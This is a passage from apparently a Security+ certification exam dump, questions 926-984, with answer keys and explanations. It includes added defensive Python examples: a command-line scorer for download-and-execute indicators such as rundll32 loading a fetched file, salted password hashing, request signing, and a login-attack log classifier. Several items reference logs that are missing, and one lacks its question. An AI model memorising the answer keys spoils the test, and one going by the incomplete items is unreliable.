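    # Benign: a user listing pictures; .jpg alone is not an indicator
    r'powershell.exe -Command "Get-ChildItem C:\Users\alice\Pictures\*.jpg"',
]


def score_command(cmd, threshold=2):
    """Return the indicators a command line triggers and a verdict.

    A single indicator is common in legitimate admin work (curl, %TEMP%), so
    the verdict requires at least `threshold` of them to coincide."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    return {"command": cmd, "indicators": hits, "suspicious": len(hits) >= threshold}


def triage(commands=SAMPLE_COMMANDS):
    """Score every command line; feed this Sysmon event 1 / 4688 command lines."""
    return [score_command(c) for c in commands]


if __name__ == "__main__":
    for result in triage():
        print(result["suspicious"], result["indicators"])
```

The threshold matters: on its own, -OutFile or a temp path is everyday administration, but a URL ending in .jpg that lands as a .dll and is immediately handed to rundll32.exe is not something a legitimate updater does.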
QUESTION 926
Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?
A. White team
B. Purple team
C. Green team
D. Blue team
E. Red team
Answer: A
Explanation:
The white team acts as the referees in a penetration test or security assessment exercise. It
establishes the rules of engagement (RoE), other guidelines, and the boundaries of the security
evaluation, oversees the event to ensure that both sides of the simulated conflict are operating
by the rules, and facilitates communication between the blue team and the red team.
QUESTION 927
A security administrator is seeking a solution to prevent unauthorized access to the internal
network. Which of the following security solutions should the administrator choose?
A. MAC filtering
B. Anti-malware
C. Translation gateway
D. VPN
Answer: A
Explanation:
MAC filtering is an access control applied at the network edge: every network interface carries
a 48-bit MAC address, and the switch or wireless access point admits only interfaces whose
addresses appear on an allow list. Because a MAC address is trivially spoofed, this deters
casual connections but should be backed by stronger controls such as 802.1X-based NAC.
QUESTION 928
A security administrator is working on a solution to protect passwords stored in a database
against rainbow table attacks. Which of the following should the administrator consider?
A. Hashing
B. Salting
C. Lightweight cryptography
D. Steganography
Answer: B
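Why salting defeats a rainbow table, shown in code. This is an added example, not from the exam dump: a small precomputed dictionary of unsalted SHA-256 digests stands in for a rainbow table, and the constructed passwords are looked up both unsalted and after salted PBKDF2 hashing. The password list and the 600,000-iteration count are assumptions chosen for illustration.

```python
"""Salted, iterated password hashing versus a precomputed lookup table.

Added example for the rainbow-table question above; not from the exam dump.
PRECOMPUTED is a constructed stand-in for a rainbow table."""
import hashlib
import hmac
import secrets

COMMON_PASSWORDS = ["password", "123456", "letmein", "Summer2023!"]
# Unsalted digests can be precomputed once and reused against every database
PRECOMPUTED = {hashlib.sha256(p.encode()).hexdigest(): p for p in COMMON_PASSWORDS}


def crack_with_table(digest_hex):
    """Reverse a digest by lookup; only works when the stored hash is unsalted."""
    return PRECOMPUTED.get(digest_hex)


def hash_password(password, salt=None, iterations=600_000):
    """Return the per-user record to store: salt, iteration count and digest.

    A fresh random 16-byte salt per password means identical passwords get
    different hashes and a table would have to be rebuilt for every salt; the
    iteration count makes each rebuild expensive."""
    salt = secrets.token_bytes(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": dk.hex()}


def verify_password(password, record):
    """Recompute with the stored salt and compare in constant time."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(dk.hex(), record["hash"])


def demo():
    pw = "letmein"
    unsalted = hashlib.sha256(pw.encode()).hexdigest()
    first, second = hash_password(pw), hash_password(pw)
    return {
        "unsalted_cracked": crack_with_table(unsalted),          # table hit
        "salted_cracked": crack_with_table(first["hash"]),       # no hit
        "same_password_different_hashes": first["hash"] != second["hash"],
        "verify_correct": verify_password(pw, first),
        "verify_wrong": verify_password("letmeout", first),
    }


if __name__ == "__main__":
    print(demo())
```

Salting on its own only removes the precomputation advantage; the iteration count (or a memory-hard function such as scrypt or Argon2) is what makes per-guess brute force slow, so the two are used together.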
QUESTION 929
A company is launching a website in a different country in order to capture user information that a
marketing business can use. The company itself will not be using the information. Which of the
following roles is the company assuming?
A. Data owner
B. Data processor
C. Data steward
D. Data collector
Answer: B
Explanation:
The company collects and handles the personal data on behalf of the marketing business, which
decides what the data is used for; the company itself does not use it. In privacy terms the party
that determines the purpose of processing is the controller (the data owner), and a party that
handles the data only on the controller's instructions is the data processor. A data steward is
an internal role concerned with data quality and metadata, not with who the data is processed for.
QUESTION 930
An employee used a corporate mobile device during a vacation. Multiple contacts were modified
in the device during the employee's vacation. Which of the following attack methods did an
attacker use to insert the contacts without having physical access to the device?
A. Jamming
B. Bluejacking
C. Disassociation
D. Evil twin
Answer: B
QUESTION 931
A security analyst is reviewing packet capture data from a compromised host on the network. In
the packet capture, the analyst locates packets that contain large amounts of text. Which of the
following is most likely installed on the compromised host?
A. Keylogger
B. Spyware
C. Trojan
D. Ransomware
Answer: A
Explanation:
A keylogger is a type of malware that records keystrokes made on a computer keyboard. This
would allow an attacker to capture any text entered by the user, which could be included in the
captured packets.
QUESTION 932
A security analyst reviews web server logs and notices the following line:
Which of the following vulnerabilities is the attacker trying to exploit?
A. SSRF
B. CSRF
C. XSS
D. SQLi
Answer: D
QUESTION 933
A user is having network connectivity issues when working from a coffee shop. The user has
used the coffee shop as a workspace for several months without any issues. None of the other
customers at the coffee shop are experiencing these issues. A help desk analyst at the user's
company reviews the following Wi-Fi log:
Which of the following best describes what is causing this issue?
A. Another customer has configured a rogue access point.
B. The coffee shop network is using multiple frequencies.
C. A denial-of-service attack by disassociation is occurring.
D. An evil twin access point is being utilized.
Answer: C
QUESTION 934
Which of the following is a physical security control that ensures only the authorized user is
present when gaining access to a secured area?
A. A biometric scanner
B. A smart card reader
C. A PKI token
D. A PIN pad
Answer: A
QUESTION 935
A company is moving to new location. The systems administrator has provided the following
server room requirements to the facilities staff:
- Consistent power levels in case of brownouts or voltage spikes
- A minimum of 30 minutes runtime following a power outage
- Ability to trigger graceful shutdowns of critical systems
Which of the following would BEST meet the requirements?
A. Maintaining a standby, gas-powered generator
B. Using large surge suppressors on computer equipment
C. Configuring managed PDUs to monitor power levels
D. Deploying an appropriately sized, network-connected UPS device
Answer: D
Explanation:
An uninterruptible power supply (UPS) conditions incoming power, riding out sags, brownouts
and spikes from its battery and filtering circuitry, and carries the load for a limited time
when utility power fails. Sized for the server room's draw it can meet the 30-minute runtime
requirement, and a network-connected (managed) UPS can signal the servers to shut down
gracefully before the battery is exhausted. A generator covers long outages but takes time to
start and does not condition power, surge suppressors only address spikes, and managed PDUs
monitor power without supplying any.
QUESTION 936
Which of the following would provide guidelines on how to label new network devices as part of
the initial configuration?
A. IP schema
B. Application baseline configuration
C. Standard naming convention policy
D. Wireless LAN and network perimeter diagram
Answer: C
Explanation:
Standard naming convention policy would provide guidelines on how to label new network
devices as part of the initial configuration. A standard naming convention policy establishes a
consistent method for naming and labeling IT assets, such as network devices, in order to ensure
clear and unambiguous identification.
QUESTION 937
A systems engineer thinks a business system has been compromised and is being used to
exfiltrate data to a competitor. The engineer contacts the CSIRT. The CSIRT tells the engineer to
immediately disconnect the network cable and to not do anything else. Which of the following is
the most likely reason for this request?
A. The CSIRT thinks an insider threat is attacking the network.
B. Outages of business-critical systems cost too much money.
C. The CSIRT does not consider the systems engineer to be trustworthy.
D. Memory contents, including fileless malware, are lost when the power is turned off.
Answer: D
Explanation:
Pulling the network cable stops the exfiltration and isolates the host while keeping it powered,
so volatile evidence (running processes, open network connections, and any fileless malware that
exists only in RAM) survives for the CSIRT to capture with a memory dump. Powering the system
off or rebooting it would destroy that evidence.
QUESTION 938
Which of the following best describes the situation where a successfully onboarded employee
who is using a fingerprint reader is denied access at the company's main gate?
A. Crossover error rate
B. False match rate
C. False rejection
D. False positive
Answer: C
QUESTION 939
Which of the following should customers who are involved with UI developer agreements be
concerned with when considering the use of these products on highly sensitive projects?
A. Weak configurations
B. Integration activities
C. Unsecure user accounts
D. Outsourced code development
Answer: D
Explanation:
Outsourced code development. Outsourced code development can introduce risks to the security
and confidentiality of the project if not properly managed and monitored.
QUESTION 940
A police department is using the cloud to share information with city officials. Which of the
following cloud models describes this scenario?
A. Hybrid
B. Private
C. Public
D. Community
Answer: D
Explanation:
The cloud model that describes the scenario where a police department is using the cloud to
share information with city officials is the Community Cloud model.
The Community Cloud model is a cloud infrastructure that is shared among organizations with
similar interests, concerns or mission. In this model, the cloud infrastructure is used by a group of
organizations to share information, resources, and services to achieve common goals.
QUESTION 941
A user reports that a bank's website no longer displays a padlock symbol. A security analyst
views the user's screen and notices the connection is using HTTP instead of HTTPS. Which of
the following attacks is most likely occurring?
A. Memory leak
B. SSL stripping
C. API
D. Pass the hash
Answer: B
Explanation:
SSL stripping is an on-path (man-in-the-middle) attack in which the attacker intercepts the
traffic between the client and the server, keeps an HTTPS connection to the server, and serves
the client a downgraded HTTP copy of the site. The user then submits credentials in cleartext
to the attacker, and the missing padlock is the visible symptom. Browsers refuse the downgrade
for sites that send an HTTP Strict Transport Security (HSTS) header or are on the HSTS preload
list, which is the standard defense.
QUESTION 942
A data center has experienced an increase in under-voltage events following electrical grid
maintenance outside the facility. These events are leading to occasional losses of system
availability. Which of the following would be the most cost-effective solution for the data center to
implement?
A. Uninterruptible power supplies with battery backup
B. Managed power distribution units to track these events
C. A generator to ensure consistent, normalized power delivery
D. Dual power supplies to distribute the load more evenly
Answer: A
QUESTION 943
A security architect is designing a remote access solution for a business partner. The business
partner needs to access one Linux server at the company. The business partner wants to avoid
managing a password for authentication and additional software installation. Which of the
following should the architect recommend?
A. Soft token
B. Smart card
C. CSR
D. SSH key
Answer: D
Explanation:
The security architect should recommend using SSH key authentication for the remote access
solution.
QUESTION 944
A security analyst is assisting a team of developers with best practices for coding. The security
analyst would like to defend against the use of SQL injection attacks. Which of the following
should the security analyst recommend first?
A. Tokenization
B. Input validation
C. Code signing
D. Secure cookies
Answer: B
QUESTION 945
Cloud security engineers are planning to allow and deny access to specific features in order to
increase data security. Which of the following cloud features is the most appropriate to ensure
access is granted properly?
A. API integrations
B. Auditing
C. Resource policies
D. Virtual networks
Answer: C
QUESTION 946
A security operations technician is searching the log named /var/messages for any events that
were associated with a workstation with the IP address 10.1.1.1. Which of the following would
provide this information?
A. cat /var/messages | grep 10.1.1.1
B. grep 10.1.1.1 | cat /var/messages
C. grep /var/messages | cat 10.1.1.1
D. cat 10.1.1.1 | grep /var/messages
Answer: A
QUESTION 947
A security analyst is investigating a report from a penetration test. During the penetration test,
consultants were able to download sensitive data from a back-end server. The back-end server
was exposing an API that should have only been available from the company's mobile
application. After reviewing the back-end server logs, the security analyst finds the following
entries:
Which of the following is the most likely cause of the security control bypass?
A. IP address allow list
B. User-agent spoofing
C. WAF bypass
D. Referrer manipulation
Answer: B
Explanation:
The User-Agent header is set by the client, so a back end that grants API access because the
header matches the mobile app's string is trusting an assertion the caller controls. The
consultants copied the app's User-Agent value into their own requests and the server treated
them as the legitimate mobile application, bypassing the control that was supposed to restrict
the API to that app. Restricting an API to a particular client requires something the client can
prove, such as an authenticated user token or a signed request, not a recognizable header.
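The weak control and a hardened replacement, side by side. This is an added example and not code from the exam dump: allowed_by_user_agent() is the check the scenario describes, and allowed_by_signature() requires an HMAC over the request and a fresh timestamp. The app name AcmeMobile, the X-Timestamp and X-Signature header names, and the shared secret are assumptions made for the example.

```python
"""A User-Agent allow list versus a request-signature check.

Added example for the API-bypass question above; not from the exam dump.
AcmeMobile, the header names and APP_SECRET are assumptions."""
import hashlib
import hmac
import secrets

APP_UA_PREFIX = "AcmeMobile/"        # assumed legitimate app User-Agent
APP_SECRET = secrets.token_bytes(32)  # constructed; in practice issued per user or session


def allowed_by_user_agent(headers):
    """The weak control from the scenario: trusts a header the client chooses."""
    return headers.get("User-Agent", "").startswith(APP_UA_PREFIX)


def sign_request(secret, method, path, body, timestamp):
    """HMAC-SHA256 over method, path, timestamp and body; sent as X-Signature."""
    msg = f"{method}\n{path}\n{timestamp}\n".encode() + body
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def allowed_by_signature(headers, method, path, body, secret, now, max_skew=300):
    """Hardened check: the caller must prove possession of the secret and the
    request must be fresh, so a header copied from a captured request is useless."""
    ts, sig = headers.get("X-Timestamp"), headers.get("X-Signature")
    if not ts or not sig:
        return False
    try:
        ts = int(ts)
    except ValueError:
        return False
    if abs(now - ts) > max_skew:      # reject replays of old captures
        return False
    expected = sign_request(secret, method, path, body, ts)
    return hmac.compare_digest(expected, sig)


def demo(now=1_700_000_000):
    method, path, body = "GET", "/api/v1/customers", b""
    # Legitimate app request: correct User-Agent and a valid, fresh signature
    app_headers = {
        "User-Agent": "AcmeMobile/3.2 (iOS 17)",
        "X-Timestamp": str(now),
        "X-Signature": sign_request(APP_SECRET, method, path, body, now),
    }
    # Pentester: same User-Agent string, no secret
    spoofed_headers = {"User-Agent": "AcmeMobile/3.2 (iOS 17)"}
    # Pentester replays a request captured an hour ago, signature and all
    old = now - 3600
    replayed_headers = {**app_headers, "X-Timestamp": str(old),
                        "X-Signature": sign_request(APP_SECRET, method, path, body, old)}
    return {
        "spoofed_passes_ua_check": allowed_by_user_agent(spoofed_headers),
        "spoofed_passes_signature_check": allowed_by_signature(
            spoofed_headers, method, path, body, APP_SECRET, now),
        "app_passes_signature_check": allowed_by_signature(
            app_headers, method, path, body, APP_SECRET, now),
        "replay_passes_signature_check": allowed_by_signature(
            replayed_headers, method, path, body, APP_SECRET, now),
    }


if __name__ == "__main__":
    print(demo())
```

A secret embedded in a mobile app binary can itself be extracted, which is why production APIs bind the signature or token to an authenticated user rather than to the app as a whole; the point the example makes is that the server must verify something the client cannot simply assert.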
QUESTION 948
Which of the following processes would most likely help an organization that has conducted an
incident response exercise to improve performance and identify challenges?
A. Lessons learned
B. Identification
C. Simulation
D. Containment
Answer: A
Explanation:
The process that would most likely help an organization that has conducted an incident response
exercise to improve performance and identify challenges is lessons learned.
Lessons learned is a process that involves analyzing an incident, reviewing what went well,
identifying challenges, and making recommendations for improvement. By conducting a lessons
learned process after an incident response exercise, an organization can identify areas where it
needs to improve and take steps to address these areas. The lessons learned process can also
help organizations identify best practices and strategies that were successful during the exercise.
QUESTION 949
Which of the following control types is patch management classified under?
A. Deterrent
B. Physical
C. Corrective
D. Detective
Answer: C
Explanation:
Corrective controls are designed to address an issue or vulnerability that has already been
identified. Patch management is the process of applying updates or patches to software systems
to address vulnerabilities or bugs that have been identified.
QUESTION 950
A security analyst is investigating what appears to be unauthorized access to a corporate web
application. The security analyst reviews the web server logs and finds the flowing entries:
Which of the following password attacks is taking place?
A. Dictionary
B. Brute-force
C. Rainbow table
D. Spraying
Answer: B
Explanation:
In a brute-force attack the attacker tries every possible value until the correct one is found.
Log entries that show a single account being tried with PINs that increment by one on each
request (0001, 0002, 0003, ...) are the signature of that exhaustive enumeration. A dictionary
attack would show wordlist entries rather than a counting sequence, and spraying would show one
value tried across many different accounts.
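The distinction above turned into detection logic over web server log lines. This is an added example and not from the exam dump; because the question's log is not reproduced on the page, the access-log lines are constructed (Combined Log Format with the credentials in the query string, as the question implies), and the dictionary label is a heuristic fallback for repeated non-sequential failures against one account.

```python
"""Classify failed-login patterns: brute force (incrementing PIN against one
account), password spraying (one value across many accounts), or neither.

Added example, not from the exam dump; the log lines are constructed."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\w+) (?P<path>\S+) [^"]+" (?P<status>\d{3})')
QUERY_RE = re.compile(
    r"[?&](user|username)=(?P<user>[^&\s]+).*?[?&](pin|password|pwd)=(?P<secret>[^&\s]+)")


def build_sample_log():
    """Constructed log: one sequential-PIN attacker, one sprayer, one normal login."""
    lines = []
    for i in range(1, 9):  # PINs 0001..0008 against jdoe from one source
        lines.append(f'203.0.113.9 - - [10/Oct/2023:13:55:{i:02d} +0000] '
                     f'"POST /login?user=jdoe&pin={i:04d} HTTP/1.1" 401 512')
    for u in ["alice", "bob", "carol", "dave"]:  # one password, many users
        lines.append(f'198.51.100.7 - - [10/Oct/2023:14:01:00 +0000] '
                     f'"POST /login?user={u}&password=Winter2023! HTTP/1.1" 401 512')
    lines.append('192.0.2.4 - - [10/Oct/2023:14:02:00 +0000] '
                 '"POST /login?user=erin&pin=4821 HTTP/1.1" 200 2048')
    return "\n".join(lines)


def parse_attempts(text):
    """Group login attempts per source IP as (user, submitted secret, status)."""
    attempts = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        q = QUERY_RE.search(m.group("path"))
        if not q:
            continue
        attempts[m.group("ip")].append((q.group("user"), q.group("secret"), int(m.group("status"))))
    return attempts


def is_sequential(values):
    """True when every value is numeric and each is the previous plus one."""
    nums = [int(v) for v in values if v.isdigit()]
    return len(nums) == len(values) and len(nums) >= 3 and all(b - a == 1 for a, b in zip(nums, nums[1:]))


def classify(attempts, min_attempts=3):
    verdicts = {}
    for ip, rows in attempts.items():
        failures = [(u, s) for u, s, st in rows if st in (401, 403)]
        if len(failures) < min_attempts:
            verdicts[ip] = "benign"
            continue
        users = {u for u, _ in failures}
        secrets = [s for _, s in failures]
        if len(users) == 1 and is_sequential(secrets):
            verdicts[ip] = "brute-force"
        elif len(users) > 1 and len(set(secrets)) == 1:
            verdicts[ip] = "spraying"
        elif len(users) == 1:
            verdicts[ip] = "dictionary"   # heuristic: many varied guesses, one account
        else:
            verdicts[ip] = "unknown"
    return verdicts


def demo():
    return classify(parse_attempts(build_sample_log()))


if __name__ == "__main__":
    print(demo())
```

Credentials should never appear in access logs in the first place; the example works on the query string only because the question's scenario puts them there, and finding PINs in a web log is itself a finding to report.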
QUESTION 951
A company that provides an online streaming service made its customers' personal data,
including names and email addresses, publicly available in a cloud storage service. As a result,
the company experienced an increase in the number of requests to delete user accounts. Which
of the following BEST describes the consequence of this data disclosure?
A. Regulatory fines
B. Reputation damage
C. Increased insurance costs
D. Financial loss
Answer: B
QUESTION 952
Which of the following can be used to detect a hacker who is stealing company data over port
80?
A. Web application scan
B. Threat intelligence
C. Log aggregation
D. Packet capture
Answer: D
Explanation:
Packet capture involves capturing and analyzing network traffic to identify malicious activity. By
capturing packets sent and received over port 80, which is commonly used for HTTP traffic, it is
possible to identify any suspicious activity that could indicate a hacker stealing company data.
QUESTION 953
A company recently enhanced mobile device configuration by implementing a set of security
controls: biometrics, context-aware authentication, and full device encryption. Even with these
settings in place, an unattended phone was used by a malicious actor to access corporate data.
Which of the following additional controls should be put in place first?
A. GPS tagging
B. Remote wipe
C. Screen lock timer
D. SEAndroid
Answer: B
Explanation:
Remote wipe allows an authorized user to remotely erase all data from a lost or stolen mobile
device, thereby preventing unauthorized access to corporate data. Even with security controls
such as biometrics, context-aware authentication, and full device encryption in place, a lost or
stolen device can be a significant risk if it contains sensitive corporate data. Therefore, remote
wipe is a critical control to have in place to mitigate the risk of data breaches resulting from lost or
stolen devices.
QUESTION 954
An organization wants to quickly assess how effectively the IT team hardened new laptops.
Which of the following would be the best solution to perform this assessment?
A. Install a SIEM tool and properly configure it to read the OS configuration files
B. Load current baselines into the existing vulnerability scanner
C. Maintain a risk register with each security control marked as compliant or non-compliant
D. Manually review the secure configuration guide checklists
Answer: B
Explanation:
Loading the organization's hardening baselines into the vulnerability scanner it already runs
lets it perform a compliance scan of every new laptop and report deviations automatically, which
is the quickest way to measure the hardening work. Manually walking through secure configuration
checklists is thorough but slow, a SIEM parses logs rather than assessing configurations, and a
risk register records control status without verifying it.
QUESTION 955
A user is trying to upload a tax document which the corporate finance department requested but a
security program is prohibiting the upload. A security analyst determines the file contains PII.
Which of the following steps can the analyst take to correct this issue?
A. Create a URL filter with an exception for the destination website
B. Add a firewall rule to the outbound proxy to allow file uploads
C. Issue a new device certificate to the user's workstation
D. Modify the exception list on the DLP to allow the upload
Answer: D
Explanation:
The security program is blocking the upload because it has identified PII in the file. This indicates
that the organization has a Data Loss Prevention (DLP) program in place that is configured to
prevent the unauthorized transfer of sensitive data.
QUESTION 956
A cybersecurity analyst at Company A is working to establish a secure communication channel
with a counterpart at Company B, which is 3,000 miles (4,828 kilometers) away. Which of the
following concepts would help the analyst meet this goal in a secure manner?
A. Digital signatures
B. Key exchange
C. Salting
D. PPTP
Answer: B
Explanation:
Key exchange is a concept in cryptography that involves the secure exchange of cryptographic
keys between two parties to establish a secure communication channel. This process involves
using a secure algorithm to exchange keys without exposing them to eavesdropping or
interception.
QUESTION 957
A security analyst is reviewing computer logs because a host was compromised by malware.
After the computer was infected it displayed an error screen and shut down. Which of the
following should the analyst review first to determine more information?
A. Dump file
B. System log
C. Web application log
D. Security log
Answer: A
Explanation:
An error screen followed by a shutdown is a crash (a Windows stop error or a kernel panic). The
crash dump file written at that moment captures the memory state and the code that was executing
when the system failed, including the malware's components, so it is the first artifact to
examine. The system and security logs then add context about what happened on the host in the
period leading up to the crash.
QUESTION 958
A security architect is working on an email solution that will send sensitive data. However, funds
are not currently available in the budget for building additional infrastructure. Which of the
following should the architect choose?
A. POP
B. IPSec
C. IMAP
D. PGP
Answer: D
Explanation:
Out of the given options, the security architect should choose PGP (Pretty Good Privacy) to send
sensitive data via email. PGP is a widely-used encryption standard that can be implemented on
the existing email infrastructure without the need for additional infrastructure.
QUESTION 959
A user reset the password for a laptop but has been unable to log in to it since then. In addition,
several unauthorized emails were sent on the user’s behalf recently. The security team
investigates the issue and identifies the following findings:
- Firewall logs show excessive traffic from the laptop to an external
site.
- Unknown processes were running on the laptop.
- RDP connections that appeared to be authorized were made to other
network devices from the laptop.
- High bandwidth utilization alerts from that user's username.
Which of the following is most likely installed on the laptop?
A. Worm
B. Keylogger
C. Trojan
D. Logic bomb
Answer: C
QUESTION 960
A systems administrator is required to enforce MFA for corporate email account access, relying
on the possession factor. Which of the following authentication methods should the systems
administrator choose? (Choose two.)
A. Passphrase
B. Time-based one-time password
C. Facial recognition
D. Retina scan
E. Hardware token
F. Fingerprints
Answer: BE
QUESTION 961
Which of the following biometric authentication methods is the most accurate?
A. Gait
B. Retina
C. Signature
D. Voice
Answer: B
Explanation:
Retina scanning involves shining a low-intensity light into a person's eye and measuring the
unique pattern of the blood vessels in the retina at the back of the eye. The retina pattern is
unique for each individual and is nearly impossible to replicate, making it an extremely accurate
biometric authentication method.
QUESTION 962
A security team will be outsourcing several key functions to a third party and will require that:
- Several of the functions will carry an audit burden
- Attestations will be performed several times a year
- Reports will be generated on a monthly basis
Which of the following best describes the document that is used to define these requirements and
stipulate how and when they are performed by the third party?
A. MOU
B. AUP
C. SLA
D. MSA
Answer: C
Explanation:
An SLA is a contractual document that defines the level of service that the provider will deliver to
the customer, including details such as service availability, performance metrics, and how
disputes will be resolved. It also outlines the responsibilities and obligations of both parties.
QUESTION 963
A small, local company experienced a ransomware attack. The company has one web-facing
server and a few workstations. Everything is behind an ISP firewall. A single web-facing server is
set up on the router to forward all ports so that the server is viewable from the internet. The
company uses an older version of third-party software to manage the website. The assets were
never patched. Which of the following should be done to prevent an attack like this from
happening again? (Choose three.)
A. Install DLP software to prevent data loss
B. Use the latest version of software
C. Install a SIEM device
D. Implement MDM
E. Implement a screened subnet for the web server
F. Install an endpoint security solution
G. Update the website certificate and revoke the existing ones
H. Deploy additional network sensors
Answer: BEF
QUESTION 964
A security investigation revealed that malicious software was installed on a server using a server
administrator's credentials. During the investigation, the server administrator explained that
Telnet was regularly used to log in. Which of the following most likely occurred?
A. A spraying attack was used to determine which credentials to use
B. A packet capture tool was used to steal the password
C. A remote-access Trojan was used to install the malware
D. A dictionary attack was used to log in as the server administrator
Answer: B
Explanation:
The use of Telnet by the server administrator suggests that the credentials were transmitted in
cleartext, which means that they could have been intercepted by an attacker who was monitoring
the network traffic.
QUESTION 965
Stakeholders at an organization must be kept aware of any incidents and receive updates on
status changes as they occur. Which of the following plans would fulfill this requirement?
A. Communication plan
B. Disaster recovery plan
C. Business continuity plan
D. Risk plan
Answer: A
Explanation:
A communication plan is a crucial component of any incident management plan. It outlines how
stakeholders will be kept informed about the incident, including what information will be
communicated, who will communicate it, and how frequently updates will be provided. The plan
also defines the methods and channels of communication, such as email, phone, or social media,
and identifies the target audiences for each type of communication.
QUESTION 966
An employee who is using a mobile device for work is required to use a fingerprint to unlock the
device. Which of the following is this an example of?
A. Something you know
B. Something you are
C. Something you have
D. Somewhere you are
Answer: B
Explanation:
This is an example of biometric authentication, which is a type of authentication that uses an
individual's physical or behavioral characteristics to verify their identity. In this case, the user's
fingerprint is a unique physical characteristic that is used to authenticate their identity and unlock
the mobile device.
QUESTION 967
Which of the following security controls can be used to prevent multiple people from using a
unique card swipe and being admitted to a secure entrance?
A. Visitor logs
B. Faraday cages
C. Access control vestibules
D. Motion detection sensors
Answer: C
Explanation:
Access control vestibules, also known as mantraps, are designed to prevent unauthorized
individuals from gaining access to secure areas. They work by providing an intermediate space
between two secure doors, where individuals must first be authenticated before being granted
access through the second door. This prevents multiple people from using a single card swipe to
enter a secure area, as only one individual can enter the vestibule at a time and must be
authenticated before proceeding through the second door.
QUESTION 968
Unauthorized devices have been detected on the internal network. The devices' locations were
traced to Ethernet ports located in conference rooms. Which of the following would be the best
technical controls to implement to prevent these devices from accessing the internal network?
A. NAC
B. DLP
C. IDS
D. MFA
Answer: A
Explanation:
NAC (Network Access Control) would be the best technical control to prevent unauthorized
devices from accessing the internal network. NAC can be used to enforce policies that allow only
authorized devices to connect to the network. It can also ensure that devices meet certain
security requirements, such as the presence of antivirus software, before granting access to the
network.
QUESTION 969
A Chief Information Security Officer (CISO) wants to implement a new solution that can protect
against certain categories of websites whether the employee is in the office or away. Which of the
following solutions should the CISO implement?
A. WAF
B. SWG
C. VPN
D. HIDS
Answer: B
Explanation:
SWG (Secure Web Gateway) would be the best solution for protecting against certain categories
of websites, whether the employee is in the office or away. SWGs are designed to monitor and
filter internet traffic to and from user devices, blocking access to known malicious sites or sites
that violate company policies. They provide protection against web-based threats such as
malware, phishing, and other types of attacks.
QUESTION 970
A security analyst is using OSINT to gather information to verify whether company data is
available publicly. Which of the following is the best application for the analyst to use?
A. theHarvester
B. Cuckoo
C. Nmap
D. Nessus
Answer: A
QUESTION 971
A network engineer receives a call regarding multiple LAN-connected devices that are on the
same switch. The devices have suddenly been experiencing speed and latency issues while
connecting to network resources. The engineer enters the command show mac address-table
and reviews the following output:
Which of the following best describes the attack that is currently in progress?
A. MAC flooding
B. Evil twin
C. ARP poisoning
D. DHCP spoofing
Answer: A
QUESTION 972
A security administrator needs to add fault tolerance and load balancing to the connection from
the file server to the backup storage. Which of the following is the best choice to achieve this
objective?
A. Multipath
B. RAID
C. Segmentation
D. 802.11
Answer: A
Explanation:
Multipath is a technique that uses multiple paths between two devices to provide fault tolerance
and load balancing. With Multipath, if one path fails, traffic is automatically rerouted to the
available path, ensuring high availability and data access. It also provides load balancing by
distributing traffic across multiple paths, reducing congestion on individual links and improving
performance.
QUESTION 973
Which of the following incident response phases should the proper collection of the detected IoCs
and establishment of a chain of custody be performed before?
A. Containment
B. Identification
C. Preparation
D. Recovery
Answer: A
Explanation:
Indicators of compromise should be collected, and a chain of custody established, during the
identification (analysis) phase, before containment begins. Containment actions such as isolating,
powering off or rebuilding a host alter or destroy volatile evidence, and evidence gathered without
a documented chain of custody may not hold up in legal or HR proceedings.
QUESTION 974
Which of the following measures the average time that equipment will operate before it breaks?
A. SLE
B. MTBF
C. RTO
D. ARO
Answer: B
QUESTION 975
A security administrator examines the ARP table of an access switch and sees the following
output:
A. DDoS on Fa0/2 port
B. MAC flooding on Fa0/2 port
C. ARP poisoning on Fa0/1 port
D. DNS poisoning on port Fa0/1
Answer: B
QUESTION 976
Which of the following documents specifies what to do in the event of catastrophic loss of a
physical or virtual system?
A. Data retention plan
B. Incident response plan
C. Disaster recovery plan
D. Communication plan
Answer: C
Explanation:
A Disaster Recovery Plan is a documented process for responding to disruptive events such as
natural disasters, cyber attacks, or hardware failures. It outlines the steps that need to be taken to
restore critical systems, applications, and data after a catastrophic event occurs.
QUESTION 977
Which of the following roles is responsible for defining the protection type and classification type
for a given set of files?
A. General counsel
B. Data owner
C. Risk manager
D. Chief Information Officer
Answer: B
QUESTION 978
An employee's company email is configured with conditional access and requires that MFA is
enabled and used. An example of MFA is a phone call and:
A. a push notification
B. a password
C. an SMS message
D. an authentication application
Answer: D
QUESTION 979
Which of the following is a security implication of newer ICS devices that are becoming more
common in corporations?
A. Devices with cellular communication capabilities bypass traditional network security controls
B. Many devices do not support elliptic-curve encryption algorithms due to the overhead they require
C. These devices often lack privacy controls and do not meet newer compliance regulations
D. Unauthorized voice and audio recording can cause loss of intellectual property
Answer: A
Explanation:
ICS devices are used to control and automate industrial processes, such as manufacturing,
energy production, and transportation. In recent years, newer ICS devices that are equipped with
cellular communication capabilities have become more common in corporations. While these
devices can provide benefits such as remote monitoring and control, they also pose security
risks.
QUESTION 980
While troubleshooting service disruption on a mission-critical server, a technician discovered the
user account that was configured to run automated processes was disabled because the user's
password failed to meet password complexity requirements. Which of the following would be the
best solution to securely prevent future issues?
A. Using an administrator account to run the processes and disabling the account when it is not in use
B. Implementing a shared account the team can use to run automated processes
C. Configuring a service account to run the processes
D. Removing the password complexity requirements for the user account
Answer: C
QUESTION 981
A security analyst is assessing a newly developed web application by testing SQL injection,
CSRF, and XML injection. Which of the following frameworks should the analyst consider?
A. ISO
B. MITRE ATT&CK
C. OWASP
D. NIST
Answer: C
QUESTION 982
A user's laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the
user can reach the internet but cannot access shared folders or other network resources. Which
of the following types of attacks is the user most likely experiencing?
A. Bluejacking
B. Jamming
C. Rogue access point
D. Evil twin
Answer: C
QUESTION 983
Which of the following procedures would be performed after the root cause of a security incident
has been identified to help avoid future incidents from occurring?
A. Walk-throughs
B. Lessons learned
C. Attack framework alignment
D. Containment
Answer: B
QUESTION 984
